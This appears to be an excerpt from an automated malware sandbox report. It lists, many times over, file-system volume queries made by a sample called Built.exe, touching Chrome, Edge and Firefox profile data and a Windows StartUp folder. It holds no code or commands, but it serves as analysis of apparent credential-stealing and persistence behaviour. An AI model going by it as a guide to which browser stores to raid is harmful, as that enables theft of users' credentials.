                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
